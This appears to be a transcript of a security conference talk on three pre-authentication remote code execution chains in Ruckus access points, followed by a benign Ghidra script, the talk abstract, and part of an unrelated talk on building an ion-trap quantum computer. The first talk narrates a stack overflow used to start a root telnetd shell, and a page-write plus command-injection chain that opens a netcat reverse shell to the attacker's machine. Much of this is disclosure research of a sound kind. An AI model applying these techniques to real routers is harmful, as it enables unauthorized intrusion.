Here is GDRA decompiled code for a drop executable that was compiled with a trace option. Here we see that its log string contains a function name. This is buff get e-cdsa-prive-key. Our script uses regux to match the log print and group the function name. Then it replaces the function name with the group matches. So this is how we managed to retrieve function name for dropper binary as well. So this script is already available on Alif GitHub account. Feel free to use it. It's really useful for many projects. But back to my second attack. So now I would like to present three important binaries in the web interface. 
The first one is slash b and slash webs. This is the actual embed this web server. It handles htp request and executes handles according to the configuration we just saw. It then sends command through a Unix domain socket to emfd. Emfd is an executable that contains the web interface logic. It maps function from the web pages to its own function. It then implement web interface commands such as backup, network configuration, retrieve system information and much more. Libemfd.so is a library that's used by emfd for web authentication, some sanitation, and some code execution. And now in a diagram. So webs listen to htp slash htps. If it receives jfsame page, it uses egs handler to pass function to emfd. Emfd then checks if the function name is mapped and if so, he calls the function pointer. And eventually emfd runs some kind of shell command. For example, if config, ip tables, route, and et cetera. I will get back to this later, but look at this carefully because this is where everything messed up. Okay. For example, when I'm sending an htp request to slash admin slash underscore update guest image name dot jsp. Webs invoke the egs handler. This handler uses a function called delegate which sends a command to emfd through a domain Unix socket. emfd then maps every string it receives to a function pointer and runs it. Here we see that egs handler uses upload verify string to send to emfd and emfd then maps this string to a function also called upload verify. All right. Next let's talk about how the authentication mechanism works. So there are four permission levels admin user fm and guest. Here we see that each user has a page with a delegate function call. For example, fm login uses off fm and user login uses off user and so on. Once a user is authenticated, his session is stored for a specific period of time. Each jsp page should check if the session is valid before calling other delegate function. Here we see that underscore cmd state dot jsp calls session check before he calls the adjunct cmd state and that means he checks for valid session before he runs the adjunct cmd state. All right, so I used grep and got 67 pages that did not perform any kind of check. I then listed all the different functions that can be reached without authentication and one function that looked very interesting was this adjunct restricted cmd state. Here we can see that it does not perform the session check and it can be reached by sending a request to slash tool slash underscore rcmd state dot jsp. But enough with the talk, let's go to my second demo which is the Stack Overflow Exploitation. Again I'll just use my terminal. Yeah, just a minute. Live demo is all tough. Apparently. Okay, here am I. Yeah. Okay, so now, everybody see? Yeah. Awesome. So now first I would like to telnet my router on port 1, 2, 3, 4, 5 and see that nothing works which is good. And now this is my payload. So I'm, this is my overflow and I'm going to call 10 at D with minus L and minus P12345. Okay. And now let me just post this payload and hopefully I will not have any typos. God help me. And underscore rcmd state dot jsp. Great. So in a second it should work. Awesome. So I got a message okay which is a great indication. And now I can just telnet my router on port 1, 2, 3, 4, 5 and as you can see I am the admin and again I am the part of the root. Yeah, this is it. Thank you. Okay. So to understand how I was able to exploit this stack overflow I would like to explain how the adgex request works. 
I was able to run both embed this web server and emfd on the QMU system emulation and that's how I was able to inspect a standard web request like that. Here I call the underscore cmd state dot jsp page which is mapped in emfd to a function called adgex cmd state. Makes sense. Cmd state receives an action attribute from the request. Since the action is do command it uses something called adapter command. Adapter do command then calls a do command function. Do command is a large switch case function that executes different command based on the attribute it gets. In this example it gets get connect status which calls a function called cmd get internet status. Now let's look on a page that do not perform session check. Emfd maps underscore rcmd state jsp to a function called adgex restricted cmd state. This is where the r stands for. The function also called adgex cmd state but with a very limited set of commands. This specific request pass zapd to do command and it runs an executable called zap. This is how zap command runs in the shell. We see that we can control its server and client argument by passing the attribute server and client. The thing is server and client are not sanitized good enough. So I can just pass unintended argument to zap. For example this minus d slash temp slash b crush me please. So I was able to find zap sources online. Ruckus described it as robust network performance test tool. And when I examined the code I noticed there's a stack overflow in the minus d argument. Here's the code that parses minus d argument. Let's see what it does. So first it replaces all commands character with spaces. Then it copies every segment to temp buffer. Since it expects a number this is a very small buffer. And well they try to be secure by using by copying string with strn copy but they use the entire string length for n. So it doesn't really protect the string in any way and I was able to smash the stack. As for expectation R510 uses both nx and aslr. To overcome nx I decided to use rope gadget. I used two gadgets to run system with a pointer to my payload. In this case I'm using telnet d that runs slash bin slash sage as a login page on port 12345. As for aslr since zap is forked from emfd I can use brute force approach and by that overcome its 9 bit of randomness. So now I would like to look at a request that runs zap command again. So if I can control the server and client attributes why can I just use it for command injection? So to understand this I need to understand how zap command is being executed. Here we can see that do command uses exec syscmd implementation to run zap. Exec syscmd implementation is a function in lib emf. This function first called find sysrapper function and then it uses v fork and exec v to execute the shell command. Let's look on find sysrapper decomplied code. We see it looks for slash bin slash sysrapper underscore wrapper dot sh. If the script is available it updates a global variable that I named sysrapper path. Now exec sys command implementation executes slash bin slash sysrapper and in our case it runs zap command with the argument from the adjunct request such as server and client. Here we can see the sysrapper dot sage line count and it seems like a very big script. But it handles many commands but what interesting me is the zap execution command. Here we see that slash bin slash zap is being executed with opt variable. This variable receives both server and client values from the request. 
However, ops gets its value with quotation mark and that stops me from injecting code. That made my life sucks for a while, to be honest. But what kept me entertained and motivated was that Ruckus had the weirdest CLI in their firmware. So before I continue to my next attack, I would like to show you other Ruckus CLI. So this is the CLI I had to escape for the first attack. This is an entire different CLI that also being used by the device. I noticed that it can be reached after system startup. This CLI also got a hidden command, exclamation mark, V54 exclamation mark that also supposed to escape to busybox. But it also needed the device serial number and it was no good to me. However, this V54 command uses content from this file, slash writeable, slash etc, system, access. The content of the access file was written by another hidden command called Ruckus. I discovered that by passing this string to Ruckus command, I was able to inject code and escape the shell. But now for the weird stuff. When I called Ruckus command to save my payload, this is what I got. And this one, and this one. Yeah, waf, waf, bow, bow, and rough. Yeah. Ruckus CLI actually boxed at me. Yeah. So when I called V54 to execute my command injection, I was asked what the chow? As in chow-chow dogs? What the actual fuck? No, seriously. Well, at the end, I was able to run a busybox shell and I didn't really care about those weird Easter eggs. But it was still pretty entertaining. Yeah. Well, I still wanted to achieve pre-off remote code execution by command injection. And I just knew that EMFD got to be vulnerable. It took me some time, but eventually I made this possible. And this is my last attack where I found a command injection vulnerability and I was able to reach it without authentication by writing a web page. All right. So as I mentioned before, EMFD executes code in a really messy way. EMFD sometimes uses lib-emf, other times called shell script sys-rapper, and sometimes it just runs the command itself with libc. These are all the different functions that EMFD uses to execute shell code. Here we see that there are 107 libc system function call. So I had to find a page that uses this function call without sanitation. I was able to find four functions that call system without, that call system and were vulnerable to command injection, and today I will be showing the last one, which is cmd import AVP port. All right. So to reach the vulnerable function, I need to send an adjunct request to slash admin slash underscore cmd state dot jsp. And my request should look like this. I'm passing a command with cmd equals import AVP port. This also uses do command to call cmd import AVP port function. This function uses libc system function unsafely. Here we see the function decompiled code. All I had to do is to pass command injection in the upload file attribute, and as you can see, it just executes the code. All right. So this is it. That's a win. Well, not exactly. I still needed to be authenticated to reach this function. Well, the problem was that cmd state page check for session, and only then it calls the vulnerable function, adjunct cmd state. All right. So I need a different approach, and what if I could write a page that only calls adjunct cmd state and do not use the session check call? It might actually work. For this, I decided to use the zap executable again. Zap has a lot of different arguments, and we already know that we can pass unintended arguments to it without authentication. 
One of them is set a path for the zap's log. However, writing a log is not enough for me. I need to control the content. For this, I used tag, sub, and note argument. They are a string, and just so they get a string and just write it in the log file for some extra information. Here is the log file writing code. It gets the file path directly from minus l. And I can control the log content by passing argument, note, tag, and sub. Okay, great. But there are more problems to solve here. I wanted to write a page, and it has to be in the slash web directory. The problem was that slash web is a part of the squash.fs file system, which is a read-only file system. I needed to find a writeable path inside web directory. Luckily, slash web slash uploaded directory is symbolically linked to slash writeable slash etc slash errspider. And this directory is on a writeable file system. Yay for me. Okay, so now I knew that I can write a file with my content to the web directory. The only problem left to solve was that Zap executable needed to connect to something called TX station. Otherwise, it won't write anything to the log file. Since I got Zap sources, I could just compile ZapD, which is the TX station. And now I can set Zap to connect to a station on my computer. Awesome. So this was the request I needed to send. It executed this Zap command. Notice that I used two arguments, minus s sub and minus t tag to write my delegate call. Finally, Zap has wrote a file to slash web slash uploaded slash index dot jsp. Although this page was full of junk, that didn't bother me because what interests me was the delegate call to the vulnerable function. Now I can chain those two vulnerabilities together. First I write a page to slash web slash uploaded slash index dot jsp. Now I can send a command injection payload to the page I just wrote. And this is the time for my last demo, which is the most difficult one. So good luck to me. Okay, so first I will need another terminal. Yeah, this is it. So in this one, I will run ZapD, which is the TX station. And I will listen to port 444 with Netcat. Great. And now for my other terminal. Okay, great. So now I would like to show you the page create payload. So as you can see here, I'm using the server and sending it to my computer. And I'm using the minus l to write a page and minus t and minus s to write the delegate function call to Ajax CMD state. And now I can just post it. Page create, this is it, to my router, slash tool slash underscore rcmdstate dot jsp. No typos. And in a minute, it will just reply and say, okay, awesome. So now I wrote the page. Next I would like to show you my command injection payload. So here I am using NC on the router. And with Netcat, I'm just connecting to my computer on port 4444 with a reverse shell. And, again, I will post this command injection to the router on uploaded slash index dot jsp. Oh, yeah, shit. Sorry about that. Okay, again. Great. And now, hopefully, hopefully I'll see that I am the root user. One more second. Again. And now, be root. Yes! Okay, okay. Yeah, wow. That's, yeah, live demos. How about that? You don't see them anymore. Okay. In conclusion, I demonstrated three pre-auth RCE today. The first one was credential leakage with CLI jailbreak. The second one was stack overflow without authentication. And the last one was command injection with authentication bypass. I also showed my Docker setup and introduced a very useful Jidra script that helped with my research and can help others. 
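The published script lives on the Aleph Research GitHub account; purely as an illustration of the renaming idea (this is not the published code), a Ghidra Python script along these lines walks the unnamed functions, decompiles each one and pulls a function name out of its log strings. The regular expression is a placeholder that has to be adapted to the target binary's log format.

    import re
    from ghidra.app.decompiler import DecompInterface
    from ghidra.program.model.symbol import SourceType

    # placeholder pattern: adjust to how the target embeds function names in its log strings
    LOG_NAME_RE = re.compile(r'"[A-Z]+:\s*([A-Za-z_][A-Za-z0-9_]*):')

    decomp = DecompInterface()
    decomp.openProgram(currentProgram)

    for func in currentProgram.getFunctionManager().getFunctions(True):
        if not func.getName().startswith("FUN_"):
            continue  # only touch functions Ghidra could not name itself
        res = decomp.decompileFunction(func, 60, monitor)
        if not res.decompileCompleted():
            continue
        match = LOG_NAME_RE.search(res.getDecompiledFunction().getC())
        if match:
            try:
                func.setName(match.group(1), SourceType.USER_DEFINED)
            except Exception:
                pass  # duplicate or invalid names: skip and keep going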
Rocker's networks was informed about these vulnerabilities. I requested 10 CVEs for this research and they confirmed these CVEs. If there are any Rocker's user here, you should stop what you're doing and go and check that you're running the latest firmware update. If not, you may be victim to some very serious abuse. So again, please check your firmware ASAP. Okay, and well, this research was a lot of fun. It involved all sorts of different vulnerabilities. It was also an excellent opportunity to check our Docker emulation environment, which proved itself very useful. A blog post with all the details will be posted, but since Rocker's asked really nicely, I will wait with my post until January 6th. So stay tuned for my blog at Aleph Research Blog. And while you're there, check our amazing research. And this is it. Thank you very much for listening. Thank you for this great talk. So now we have quite a lot of time for Q&A. So you already know the game, queue up at the microphones, or ask a question on the Internet. We will today start with the Internet. So please. All right. So there are a couple of questions here. The first question is, will this work on unleashed firmware of Rocker's AP? Yes, we definitely will. Not the latest, but the entire research was conducted on the unleashed version. All right. Now, let's do an in-room question first. A microphone number one, please. So thanks for the great talk first. Then you mentioned that there were 107 handlers for which called system at some point. I hope you didn't check them manually. So my question would be, you probably used GDRA to search for those. Right. How would it be? Yeah. So the system, the reference count just gave me a really good indication that they're doing something wrong. And when I actually searched for command injection, I first looked what are the reachable pages that uses system. So that narrowed the list to something smaller, which was still around 15 or so. So I just saw that the command injection was done pretty much manually with GDRA. No fancy scripts here. So no analyzing of the call tree in GDRA? No. Okay. Thanks. Sure. All right. Microphone number two, please. So first of all, let me just express a what the actual fuck. Then secondly, from a networking consultant perspective, the quad one usage in your scripts, it's easy, but please don't do it because people tend to use quad one as a legit IP address in their systems for dummy IP addresses, which is actually DNS server on the public internet. And just comment. The actual question is the all your attack, your attack vectors are against when you are able to reach the system on a layer three basis, right? Yeah, correct. So both of the attacks are from both the internet or the land, but yeah, only layer three. So okay. And in the end, I can only offer you that I have some hardware from an orange vendor. I can offer you if you want to do some further exploration on other vendors. Yeah, why not? All right. The internet has another question, I think, right? Right. So the internet wants to know, is the virtual smart zone mode also affected? No, only access point and some of the vulnerabilities, as I said, also work for the zone director. All right. Number two, please. Thanks again for the entertaining talk. And I noticed that on some of the slides, there was like a hard coded cross site request for GERY token. 
So I just wanted to ask what's up with that and were you able to find more places where there are basically security boundaries crossed by a hard coded string like that? Yeah, so we found, so I tried to focus my research more on the low level and like stack overflow and command injection from the binary analyze. But yeah, we saw some web vulnerabilities. One of them is SSRF and another might be with tokens that is still hard coded. There are a lot of things to keep on looking in those fingers. So you didn't report that one? No, the hard coded one, not yet. Okay, thank you. All right, the internet. Right. So how much time did you invest in total for ripping this device into little pieces in so many ways? So it took me one month. The first exploit I found relatively fast. I think it took me around two days. And after that, the other analyze took me around three weeks or so. All right. Microphone number two. Thank you for this awesome talk. I really enjoyed it. The first bit of the presentation was a little bit fast for me, the Docker part. How did you discover that you can run the ROXs firmware in your own Docker container? Can you please repeat your question? How did you discover that you can run the ROXs firmware in your own Docker container so that you can discover all these flaws? Yeah. So I skipped a few steps. So I basically used BeanWalk and after I extracted the, so I downloaded the firmware, used BeanWalk, and then BeanWalk usually extracted squashFS, which is the firmware file system. So I just copied it to my Docker. And because it's a cross architecture Docker, it runs the ARM architecture, and I was able to actually run the code from the firmware, the user space code. Okay. Thank you. Sure. All righty. Any other questions? You have 30 seconds to invent a question. Do you have 30 seconds of content? No, I can do a fancy dance or something like that. All right. Yes, please. Okay. So I wish I could, I wish I could. All right. Still no questions? Well then, a good night to every one of you and thank our speaker again please. Thank you.
Ruckus Networks is a company selling wired and wireless networking equipment and software. This talk presents vulnerability research conducted on Ruckus access points and WiFi controllers, which resulted in 3 different pre-authentication remote code execution. Exploitation used various vulnerabilities such as information leak, authentication bypass, command injection, path traversal, stack overflow, and arbitrary file read/write. Throughout the research, 33 different access points firmware examined, and all of them were found vulnerable. This talk also introduces and shares the framework used in this research. That includes a Ghidra script and a dockerized QEMU full system emulation for easy cross-architecture research setup. Here's a fun fact: BlackHat USA 2019 used Ruckus Networks access points. Presentation Outline: This talk demonstrates 3 remote code executions and the techniques used to find and exploit them. It overviews Ruckus equipment and their attack surfaces. Explain the firmware analysis and emulation prosses using our dockerized QEMU full system framework. -Demonstrate the first RCE and its specifics. Describe the webserver logic using Ghidra decompiler and its scripting environment. -Demonstrate the second RCE using stack overflow vulnerability. -Lastly, demonstrate the third RCE by using a vulnerability chaining technique. All Tools used in this research will be published.
10.5446/53156 (DOI)
Welcome to the world of quantum computing. Well most of you are just going to say that stuff is just for cracking RSA keys, but there is actually a little bit more to that. It's interesting stuff and our next speaker, Jan Allain, is going to introduce this world of quantum computing to us and he's going to show us a couple of application scenarios and how to build your or our own quantum computer. Hello everybody. Guten tag, hallo. This is the only world I know in Deutsch. We will begin this session by trying to convince you that building a quantum computer atom is still possible. This is the agenda. We are in an infosec security conference. Why bother with quantum computing when we work at cyber security? We will try to explain to you in a simple manner how our quantum computer works. We will explain to you how we build our own quantum computer and of course because we are at CCC we need to know how to hack into a quantum computer. So let me introduce myself a little bit. I'm Jan Allain, French. I'm used to share my project with some security conference hacking the blackouts. I was a speaker and trainer in this type of conference. It's the first time for me in CCC so it's very cool. I'm mostly an entrepreneur and engineer and of course my new company, Net GenQ, which stands for a next generation of quantum computers is a quantum company. I work in the infosec security since 25 years now so I'm a veteran of this domain. I fight again. I love you, Varysys and Slammerworm if you remember those worms. And my past activities are related to software and hardware security. So why bother with quantum computing when we work in cybersecurity? If you want to make some difficult calculation on a RSRK for example, to factor a large number on a classical computer, it will take 10 to the power of 334 steps, it's a big number, and it will take on a normal computer 300 trillion of years. It's a long, long time. It's why we say that RSR is secure. On a quantum computer with a specific algorithm called short algorithm, it takes only 10 to the power of 7 steps, it's a smaller number, and it takes only 10 seconds. However, you couldn't think that this statement is a little bit overripe. Yes or no? No. Because short algorithm is able to break RSR. This is the goal of this algorithm in the human time. However, at the moment we speak, to break a big number with this algorithm, you need to have a much bigger quantum computer that exists nowadays. For example, you need a 4,000 ideal qubits quantum computer. It doesn't exist for the moment. However, quantum computing could be used also for some benefits for our domain of Anthos X-Styber security. There is many advantages on the corner. You can use a quantum computer or quantum technology to generate true random number. This is useful for cryptography. You can deploy what is called blind quantum computing. In fact, blind quantum computing is the ultimate privacy for the cloud, for example. Some guys try to launch what they call a quantum internet. It's not so easy a cable networks. With a particular feature for us that could be cool to use, if you use a quantum internet, everyone that tries to spy you on the line will be detected. So it could be very useful. And of course, quantum computing brings to the mass a massive new power of processing. But how does a computer works? This is the one slide quantum mechanics course. Why does fancy new quantum computers are so powerful? In classical computing, we use bits. A bit is only in two states, one or zero. 
In quantum computing, we replace the bits by the quantum bits, which we call them qubits. These qubits follow the quantum mechanical principle called superposition. And this principle is able to provide to the user several steps at the same time. So if you use a quantum qubit, the qubit could be in a state of zero and one nearly at the same time. It's not exactly what it is, but for us as a computer scientist, we could understand that it's zero and one at the same time. And of course, if a quantum computer, this is a quantum computer, want to manage to deal with all these qubits, it deals with all the solution of the quantum register at the same time. And it will speed up the process of that computing because you take all the space generated by this quantum register and in one clock time, the computer process all solution. This is mainly why and how the quantum computing is so powerful. So it's cool. So I want to build my own qubits. So this is my journey to build my own quantum computer. And you will see that there is some success and failure. And most of the time, and I'm in the middle of this. So I need to choose a technology to build my own qubits hardware. This talk is mainly about hardware, how to build your own hardware to build your own quantum computer. So my ingredients. I need to find a support at the hardware level that's behave like quantum mechanics say you need to behave to do a quantum computer. So I need to find something that's behave at atomic scale. I need to be able to build it so I want to be able to use my do it yourself skills. And I want that my quantum computer work at room temperature. If it could be stable machine, it could be the best. There is many, many technology to build your own qubits. This one is used by small start-up like IBM Google. Mainly the big one use this technology. Microsoft try to use this technology. This technology with diamond vacancy is used by university in Australia and in Ireland, I think. And of course I use this technology. I use the technology called trap iron. So I trapped iron to make a quantum computer. So my low level hardware support and device to do some calculation with my quantum computer is Atom. Why? I choose an Atom to make some fancy new quantum computer. The main reason is because I think I'm able to build it in my garage. It's an affordable and well-spread technology because we use technology that has been developed in 1945. There is a lot of experience with this type of technology. Again, the main reason, in fact, the qubit quality is better than any other technology. We have a long Korean time. If you have a long quantum Korean time, you can make much larger program, for example. So we need to share a bit of theory to understand how this type of computer works. So I made a choice. I could have taken time to make dozens of equations. Mainly I don't understand those equations. To explain to you how to make some calculation with ions. But I found a video on YouTube and I would like to share you this two-minute-only video to let you understand how, at the theoretical point of view, a quantum computer based on ion trap works. Let's see if it works. Aided electrically charged atoms make for excellent qubits. This kind of research has paved the way for a quantum computer prototype. Like an ordinary bit, a qubit can be a 1 or a 0. A qubit differs from a bit because it can also be in combinations of these two states. An ion qubit is made from two of its energy levels. 
Ions of the same type are identical, so adding more qubits is simple. You just need to add more ions to the system. This is a major plus, because a quantum computer will need lots and lots of qubits. Qubits must be configured in certain quantum states in order to perform quantum tasks. In an ion trap, tailored laser pulses can change the energy of an ion, setting it into qubit state 1, 0, or a combination of the two. The qubit's surrounding environment sometimes sneaks in and destroys the qubit state, a covert act that can ruin a computation. But some ion energy levels are naturally isolated, and scientists have come up with clever ways of adding in extra layers of protection. Quantum computer calculations are made from steps called logic gates. These will often involve more than one qubit, which means the qubits should be connected in some way. In an ion trap, neighboring ion qubits are connected through their collective motion. This happens because of their electrical repulsion. Laser pulses target the motion, enabling gates between any pair of qubits. To get the result of a calculation, scientists need to tell whether a qubit is in state 1 or 0. Shining laser pulses onto the ions makes only one of the two qubit levels fluoresce, so the result, light or no light, gives information about the calculation. Because many qubits are needed, quantum devices must be designed to be scalable. Researchers can only cram so many ions next to each other in a single ion trap before they get too unruly. But with modules, each containing tens or hundreds of ions, they can start to wire up a large-scale quantum computer. Light from individual ion modules can be collected, allowing ion qubits from separate modules to communicate using photons rather than their motion. So far, scientists have wired up two such modules, and they are getting ready to deploy larger devices using several more. So now, congratulations, you are experts in ion trap quantum computing. Only a two-minute video was necessary. However, we would like to build this quantum computer. So the plan is the following. We need some ions, you know that now. You need an ion trap. You need a vacuum chamber, because we need to isolate our atoms from the environment to maintain the quantum states. We need some lasers, as you saw in the video, to manipulate the quantum states. We need some low-level software to send precisely timed laser pulses to manipulate the ions. And we need a camera to measure the ions' quantum states. It's easy now. So let's go to the difficult part, I think. Mainly I would like to say that it's a work in progress. That's a nice way to say that it isn't finished. And just a warning: we need to manipulate very high voltages. So if you want to do this at home, do it at your own risk. It's not my fault. So first we need to create an ion trap. How to create an ion trap? What is an ion trap? An ion trap is mainly a bunch of electrodes with a specific 3D or 2D geometry. We send to the electrodes a medium to high voltage, an AC voltage, an alternating voltage, from 200 volts to 60 kilovolts, a big number for a voltage. We use a moderate to high frequency. This is due to the trap theory. Someone won the Nobel Prize for explaining that to trap an atom, you need to use an alternating voltage. And this voltage will create an electric field. And the goal of the electric field in the trap is just to hold all the atoms in a chain that floats in the air, over the trap.
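To make the statement that an alternating voltage is what traps the ion a bit more concrete, here is a small, hedged numerical sketch. The textbook model of an RF Paul trap reduces one axis of the ion's motion to the Mathieu equation x'' + (a - 2q cos 2t) x = 0; for suitable parameters (here a = 0, q = 0.3, chosen only for illustration and not taken from this trap) the trajectory stays bounded, which is the confinement described above, while a purely static voltage would not confine.

#include <stdio.h>
#include <math.h>

/* Dimensionless Mathieu equation for one axis of an RF Paul trap:
 *   x'' + (a - 2*q*cos(2*t)) * x = 0
 * a relates to the DC voltage, q to the RF amplitude. Values are illustrative. */
int main(void) {
    const double a = 0.0, q = 0.3;      /* inside the first stability region */
    double x = 1.0, v = 0.0;            /* initial displacement and velocity */
    const double dt = 1e-3;

    for (long step = 0; step <= 200000; step++) {
        double t = step * dt;
        double acc = -(a - 2.0 * q * cos(2.0 * t)) * x;
        v += acc * dt;                  /* semi-implicit Euler: update v, then x */
        x += v * dt;
        if (step % 20000 == 0)
            printf("t = %6.1f   x = %+.4f\n", t, x);
    }
    /* With q = 0.3 the printed x stays of order 1: the particle is trapped.
     * Try q = 1.0 (outside the stability region) and x blows up instead. */
    return 0;
}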
So how to achieve that on a small company budget? It's not for hobbyists, I think. Let's go. So I use my ultra high-tech, military-grade garage. I use a 3D printer, a low-cost CNC machine, PCB milling techniques, and only open source software: KiCad, FreeCAD, FlatCAM. KiCad for the electronics, FreeCAD for the mechanics, and FlatCAM for the CNC. I use a high-voltage transformer, classical electronics, and of course, insulated gloves. Security first. Safety first. Sometimes. And of course, I use eBay as the main procurement utility. First try: I need to make a classical Paul trap. Of course, when I don't know how something works, I go to Google, and I found that some institutions like CERN have a project to make an ion trap from 3D printed parts. I use conductive ink and a high voltage power supply. So I need to build this. There is the high voltage here, two electrodes, and one ring electrode. The goal is to trap ions with that. So this is the main laboratory setup I use. You have a variac. We take the power from your domestic electric network. The high-voltage transformer, and here, 3D printed, you have two electrodes and a camera. This is the electrode. It's a very safe wiring system. For safety reasons, I put some resistors here just to limit the current. The first time. Looking a bit closer, you will see that the high voltage is coming from this. We apply the voltages to the electrodes, and the camera is there just to see what the electrodes do. It works. I succeeded in trapping some macro particles. These are not ions, it's for demonstration purposes, but we succeeded in trapping some particles, macro particles, in the electrodes. But we have a first failure, because with this geometry we couldn't shine the laser correctly to manipulate the quantum states. First failure. Second try: we need to make another ion trap based on a new topology, a new geometry of electrodes. And this time, we use a linear Paul trap to make the laser alignment easier. So again, I need to design this new type on my own, because CERN doesn't provide the 3D printed parts for it. I use conductive ink and high voltages. So the goal is to design this. And in this trap, you will see that we trap the ions in a chain in the middle of the trap. So I use my 3D printer. I make some rods, the supports, some electrodes. I build the whole system. And I plug in the cables, the wiring. And in the trap, the particles will be trapped in this region. For this second trap, I didn't use resistors to limit the current. So it's impossible to touch these electrodes, because of death. And it works again. And in fact, this is a chain of particles, nearly perfectly aligned. And this is my first quantum register of 8 particles. But then comes the biggest failure. I need to put this ion trap in a vacuum chamber. A vacuum chamber is this type of thing. It's a big bunch of metal, and we put the ion trap inside it. Why we need a vacuum chamber, first of all, is to be able to isolate the particles from the other atoms in the atmosphere, to avoid collisions between atoms. Because if we have collisions between atoms, the quantum state is destroyed, and the quantum processing is destroyed also. So we need a vacuum chamber. But 3D printed parts are not compatible with ultra high vacuum environments. So it's a big fail. Are we doomed? Being a maker is a hard job. Really. So we need to find a new solution. We have found one. I need to find some materials that are compatible with ultra high vacuum environments to build an ion trap. I asked NASA, because NASA sends electronics into space.
Space is like a big vacuum chamber. So they have a publicly available list of materials, so you can use materials that are compatible with space conditions. They are professionals. So what are the material candidates for my ion trap? I need to use gold for the electrical conductors. I need to use ceramic for the mechanical supports, and Kapton cable for the wiring inside the vacuum chamber. So being a maker is really a hard job, because I need to find an idea to transform my 3D printed linear ion trap into something that is compatible with ultra high vacuum environments. So I need to read the manual. There is a lot of literature on quantum computers, on Google, on the Internet. So I have a bunch of books about quantum mechanics, and the research papers are full of details. I found this: some guys succeeded in transforming a linear Paul trap with rods into a planar ion trap with planar, or surface, electrodes. That's cool. So I need to transform this into that. Oh boy, I need to make my own chip. Prices for complex chip factories are around 200 million dollars. I called Intel. They don't want to sell me one. And it's a bit out of my budget scope. A bit. I thought it would take five minutes to find a solution; in fact, it took me two months to find an affordable solution to do that. So I want to make a new design of ion trap, like a boss. I use a CNC, a $300 CNC that came from Amazon. I found an empty ceramic chip carrier on eBay from a Norwegian guy, and I designed a simple KiCad PCB. So I use this. This is the ceramic chip carrier. And what you see in yellow is gold. I designed this PCB in KiCad. And this time, we apply a high voltage electric field to these electrodes, this one and those ones. And it creates an electric field that aligns all the macro particles, or the ions, along this line. And this is how I made my quantum computer chip. Thank you. And the best part is that it works. So I have my first quantum computer chip, made in my garage. And just keep calm, like a boss. And it's not just slideware, because if you want to see one of my prototypes, I brought it, so you can touch it and see how it works. But when you design such complex things (I'm not a physicist, I'm just an engineer, a crazy one), how can you be sure that you're on the right road? I went to the Science Museum in London a few months ago, and there's this exhibition from our friends at GCHQ. Do you know what GCHQ is? It's like the NSA for the UK. And they made an exhibition about cryptography. And in this museum, they present a quantum computer based on ion trap technology. Thanks. This is the experimental setup they show in this museum about the quantum computer. In the right corner of this exhibition, there is a wafer. On the wafer, you have the electrode design they made for their own ion trap. This is the design of GCHQ. This is mine. I think I'm on the right road. Of course, I need to build my own vacuum chamber. It's not the difficult part. The vacuum chamber is just metal. You need some nuts, bolts, metal and pumps, a lot of pumps, to suck all the air out of the chamber. So I bought different types of pumps off eBay. I like my vacuum chamber, this one, a pretty one. And I put the ion trap inside the vacuum chamber. And for now, I'm working on the laser and optical setup. And this is the main difficult part of this quantum computer, because we need numerous laser wavelengths, and we need to have a very precise wavelength to be able to manipulate the energy levels of the atom to make some calculations. So of course, I could have asked for an offer.
I asked some professionals in these devices to send me some proposals. A laser costs around 25 kiloeuros, at least, for this type of instrumentation. Or you can do it yourself from 2 kiloeuros. So I decided to make my own laser setup. I'm not an optics or laser specialist; it's the first time I've played with lasers. And everything is on the web. You can learn everything from the web. And I found this type of schematic. You just have a laser diode, some fancy optical lenses, a grating that lets you choose, or mainly choose, which reference frequency you want to use. There is a sort of control loop with a PID controller, which for an electronics guy like me is a normal thing to do. I don't know why all those fancy commercial products cost so much. I don't know yet. Perhaps I will have some failures in the future. But I don't know. So I found a guy on the internet who sold me a laser in kit form. You can buy it and assemble your own laser. And this laser is controlled by an Arduino. So you have a fancy mirror, the HeNe, helium-neon laser tube. And you can make your own laser at home as well. I need a bunch of optical mounts and supports to hold the lenses, the mirrors, etc. And as I bought a 3D printer for my ion trap that I cannot use anymore, because I use a vacuum chamber, I used the 3D printer to make all the optical mounts, in fact. So it saved me money again. However, you need to know that it's still a long road to a complete quantum computer, because I need to set up all these fancy optics and lasers. This is my job at the moment. I have nearly six months to one year of work ahead. But the good news is that at the software level, everything exists. If you need a compiler for your code, it exists at the moment, and it's open source. If you need a framework for pulse and laser control, it exists, and it is open source. So I'm trying to convince you, let me know if you agree with me, that building a quantum computer at home is doable. I agree. But we are at the CCC. How to hack into a quantum computer? This is the fun part. It's easy. Just do what we do as infosec guys. Do the same things we do as usual. Hack the weakest link. You must know that when you build a quantum computer, there are only a few things that behave in the quantum mechanical regime. You only need this chip, for example, and some lasers. But all the equipment surrounding the quantum parts of the quantum computer is classical systems: wave generators, classical computers, some IoT devices, some industrial systems. Sometimes they have IP addresses. So the main avenue to hack into a quantum computer is to attack the surrounding classical embedded systems. So, a small company that is a competitor of mine, a startup called IBM. They use superconducting technology to build their own quantum computer. The processor is just behind this dilution refrigerator, because they need to cool down their processor to be able to use the superconducting capability. Mine works at room temperature. And surrounding this processor, as the researchers explain (this is a very good video to understand how it works), surrounding this quantum part of their quantum computer, you have a bunch of instruments. And if you zoom in, you see. If you zoom in on this wave generator, a wave generator that sends pulses to the superconducting processor, there is a sticker. And this sticker, in fact... So of course, for security reasons, I put some X's in so as not to show the complete password.
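Before the conclusion, a quick aside on the laser section above: the control loop with a PID controller is just standard feedback. Below is a minimal, hedged sketch of such a loop in plain C; the gains, the toy first-order plant standing in for the laser, and all the names are invented for illustration and are not taken from the real setup.

#include <stdio.h>

/* Minimal PID loop of the kind used to lock a laser to a reference.
 * Everything here (plant model, gains, setpoint) is illustrative only. */
int main(void) {
    const double kp = 0.8, ki = 0.4, kd = 0.05;   /* made-up gains */
    const double dt = 0.01;
    double setpoint = 1.0;        /* target error signal, e.g. the lock point */
    double measured = 0.0;        /* e.g. a photodiode reading */
    double integral = 0.0, prev_error = 0.0;

    for (int step = 0; step < 500; step++) {
        double error = setpoint - measured;
        integral += error * dt;
        double derivative = (error - prev_error) / dt;
        double output = kp * error + ki * integral + kd * derivative;
        prev_error = error;

        /* Toy first-order plant standing in for the laser actuator:
         * the measurement relaxes toward the control output. */
        measured += (output - measured) * dt;

        if (step % 100 == 0)
            printf("step %3d  measured %.4f  control %.4f\n",
                   step, measured, output);
    }
    return 0;
}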
